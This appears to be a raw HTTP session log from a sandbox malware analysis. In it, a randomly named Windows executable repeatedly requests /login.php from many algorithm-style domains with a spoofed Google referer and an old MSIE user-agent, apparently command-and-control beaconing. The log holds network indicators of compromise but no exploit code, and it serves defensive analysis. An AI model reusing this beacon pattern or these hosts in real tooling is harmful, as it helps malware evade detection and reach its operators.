                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  104 | 192.168.2.6 | 59212 | 199.191.50.83 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.197483063 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702663898 CET | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:26 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3></div></body></html>


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  105 | 192.168.2.6 | 59214 | 178.162.203.226 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247227907 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  106 | 192.168.2.6 | 59215 | 44.221.84.105 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.249823093 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685672998 CET | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347485|1731347428|6|6|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.6 | 59218 | 18.208.156.248 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.250823021 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Nov 11, 2024 18:51:25.685869932 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347485|1731347428|19|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.6 | 59219 | 44.221.84.105 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.251024008 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Nov 11, 2024 18:51:25.689420938 CET | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347485|1731347428|7|5|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
109 | 192.168.2.6 | 59220 | 162.255.119.102 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.251224041 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:51:25.786689997 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.6 | 59221 | 154.212.231.82 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.252132893 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
Nov 11, 2024 18:51:26.143194914 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
111 | 192.168.2.6 | 59213 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.253488064 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Nov 11, 2024 18:51:25.685470104 CET | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347485|1731347428|7|5|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.6 | 59222 | 99.83.170.3 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.256028891 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
Nov 11, 2024 18:51:25.689449072 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
113 | 192.168.2.6 | 59216 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.259053946 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:51:25.691929102 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:24 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 2fa2f12c-f955-48a1-8935-1b6cffe0d01d
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:25 GMT
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:51:25.692043066 CET | 520 | IN | Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDg1LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.6 | 59223 | 188.114.96.3 | 80 | 6212 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:25.260509014 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:51:26.028939962 CET | 972 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqcDwVx95LJzOAj6qAQ7NjMTKLfoBwEHTVl2FywSYc%2FS46xqjtp0DNvwt9wHwoVJncepq9yUpMdJK98mF%2B2SUNaT74JWDzypZ7o0l5H%2BbxaQ2OA7764Y%2BUL%2FC5MMDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10215948614bd6-YUL
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.6 | 59226 | 44.221.84.105 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:26.951888084 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Nov 11, 2024 18:51:27.046267986 CET | 334 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:26 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347486|1731347428|7|6|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.6 | 59225 | 162.255.119.102 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:26.952080965 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
Nov 11, 2024 18:51:27.123919964 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:27 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port
117 | 192.168.2.6 | 59233 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:32.485188007 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Nov 11, 2024 18:51:32.853944063 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:32 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347492|1731347428|23|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.6 | 59236 | 154.212.231.82 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.644757986 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
Nov 11, 2024 18:51:34.630713940 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:51:34.873492956 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:34 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.6 | 59237 | 44.221.84.105 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.645417929 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Nov 11, 2024 18:51:34.292531013 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347494|1731347428|12|5|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
120 | 192.168.2.6 | 59235 | 99.83.170.3 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.645505905 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
